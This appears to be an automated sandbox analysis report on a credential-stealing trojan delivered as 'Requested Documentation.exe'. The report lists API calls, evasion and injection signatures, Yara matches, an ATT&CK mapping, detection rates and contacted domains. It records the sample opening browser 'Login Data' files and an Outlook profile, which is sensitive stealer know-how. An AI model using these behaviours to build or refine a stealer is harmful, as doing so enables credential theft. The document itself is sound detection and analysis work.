                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yEeYmAhLMoNIB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yEeYmAhLMoNIB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yEeYmAhLMoNIB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yEeYmAhLMoNIB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_009848D7
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_00A05376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00A05376
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009A3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_009A3187
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | API/Special instruction interceptor: Address: 1303214
                  Source: Requested Documentation.exe, 00000000.00000002.1739508199.0000000001348000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXEORZ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599313
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598483
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598332
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598023
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597813
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597688
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597219
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596765
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596313
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595592
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595264
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595047
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594938
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594813
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594688
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594344
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7837
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2006
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-105539)
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | API coverage: 4.8 %
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009E445A GetFileAttributesW,FindFirstFileW,FindClose
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EC6D1 FindFirstFileW,FindClose
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                  Source: RegSvcs.exe, 00000001.00000002.4192913744.000000000116D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | API call chain: ExitProcess graph end node (graph_0-103779)
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | API call chain: ExitProcess graph end node (graph_0-103986)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_05EE6328 LdrInitializeThunk
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009F3F09 BlockInput
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_00983B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009B5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_00984B37 LoadLibraryA,GetProcAddress
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_01303480 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_013034E0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_01301E70 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009D80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009AA124 SetUnhandledExceptionFilter
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009AA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_004123F1 SetUnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, UltraSpeed.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E66008
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009D87B1 LogonUserW
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009E4C27 mouse_event
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Requested Documentation.exe"
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009D7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009D874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                  Source: Requested Documentation.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: Requested Documentation.exe | Binary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009A862B cpuid
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00417A20 GetLocaleInfoA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009B4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009C1E06 GetUserNameW
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009B3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTR
                  Source: Yara matchFile source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Requested Documentation.exe  Binary or memory string: WIN_81
Source: Requested Documentation.exe  Binary or memory string: WIN_XP
Source: Requested Documentation.exe  Binary or memory string: WIN_XPe
Source: Requested Documentation.exe  Binary or memory string: WIN_VISTA
Source: Requested Documentation.exe  Binary or memory string: WIN_7
Source: Requested Documentation.exe  Binary or memory string: WIN_8
Source: Requested Documentation.exe  Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                  Remote Access Functionality

Source: C:\Users\user\Desktop\Requested Documentation.exe  Code function: 0_2_009F6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Requested Documentation.exe  Code function: 0_2_009F6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix, listed per tactic. A number in parentheses is the count of report signatures mapped to that technique; entries without a number are the matrix's standard placeholder cells with no matching signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (12); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (212); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); Software Packing (1); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (11); Access Token Manipulation (21); Process Injection (212); Dynamic API Resolution
Credential Access: OS Credential Dumping (1); Input Capture (121); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (1); System Information Discovery (137); Security Software Discovery (241); Virtualization/Sandbox Evasion (11); Process Discovery (2); Application Window Discovery (11); System Owner/User Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (1); Input Capture (121); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Web Service (1); Ingress Tool Transfer (2); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Source | Detection | Scanner | Label
Requested Documentation.exe | 46% | Virustotal |
Requested Documentation.exe | 58% | ReversingLabs | Win32.Trojan.Nymeria
Requested Documentation.exe | 100% | Joe Sandbox ML |
No Antivirus matches (dropped files, unpacked PE files, domains, URLs)
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.96.3 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
